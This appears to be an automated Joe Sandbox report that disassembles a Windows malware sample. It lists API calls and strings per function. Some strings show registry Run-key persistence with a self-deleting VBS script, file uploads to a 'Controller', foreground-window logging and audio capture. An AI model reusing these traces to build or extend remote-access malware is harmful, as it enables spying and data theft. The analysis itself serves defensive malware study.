                                                                                                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                                                                                                              • Opcode ID: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                              • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                                                                                              Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                              • API String ID: 738084811-1408154895
                                                                                                                                                                                              • Opcode ID: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                              • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                              • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                              Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Write$Create
                                                                                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                              Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000001,004068B2,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                              • API String ID: 1646373207-1852942174
                                                                                                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                              Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                                                                                                              • Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                              • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                                                                                              Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3899193279-0
                                                                                                                                                                                              • Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                                                                                                              • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                                                                                              Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                                                                                                              • Opcode ID: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                                                                                                                                                              • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                                                                                                                                                              Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                              • API String ID: 2490988753-744132762
                                                                                                                                                                                              • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                              • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                                                                                                              • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                                                                                                              Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                              • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                                                                                              • API String ID: 911427763-1497357211
                                                                                                                                                                                              • Opcode ID: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                                                                                                                                                              • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                                                                                              Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                              • String ID: Close
                                                                                                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                              • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                                                                                              Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                              • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                              • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                                                                                              Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                                                                                                              • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                              • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                                                                                              Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                                                              • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                              • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                                                                                              Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
